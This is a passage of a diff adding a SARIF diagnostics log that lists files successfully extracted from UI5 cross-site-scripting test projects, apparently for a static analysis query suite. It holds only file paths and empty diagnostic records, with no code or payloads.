+ "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/AllJourneys.js", + "uriBaseId" : "%SRCROOT%", + "index" : 247 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/FilterJourney.js", + "uriBaseId" : "%SRCROOT%", + "index" : 248 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/SearchJourney.js", + "uriBaseId" : "%SRCROOT%", + "index" : 249 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/TodoListJourney.js", + "uriBaseId" : "%SRCROOT%", + "index" : 250 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/arrangements/Startup.js", + "uriBaseId" : "%SRCROOT%", + "index" : 251 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/opaTests.qunit.html", + "uriBaseId" : "%SRCROOT%", + "index" : 252 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/opaTests.qunit.js", + "uriBaseId" : "%SRCROOT%", + "index" : 253 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/pages/App.js", + "uriBaseId" : "%SRCROOT%", + "index" : 254 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/testsuite.qunit.html", + "uriBaseId" : "%SRCROOT%", + "index" : 255 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/testsuite.qunit.js", + "uriBaseId" : "%SRCROOT%", + "index" : 256 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/AllTests.js", + "uriBaseId" : "%SRCROOT%", + "index" : 257 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/controller/App.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 258 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/unitTests.qunit.html", + "uriBaseId" : "%SRCROOT%", + "index" : 259 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/unitTests.qunit.js", + "uriBaseId" : "%SRCROOT%", + "index" : 260 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/util/Helper.js", + "uriBaseId" : "%SRCROOT%", + "index" : 261 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/view/App.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 262 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 263 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 264 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 265 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 266 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 267 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 268 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 269 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 270 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 271 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 272 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 273 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 274 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 275 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 276 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 277 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 278 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 279 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 280 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 281 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 282 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 283 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 284 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 285 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 286 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 287 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 288 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 289 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 290 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 291 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 292 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 293 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 294 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 295 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 296 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 297 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 298 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 299 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 300 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 301 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 302 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 303 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 304 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 305 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 306 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 307 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 308 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" 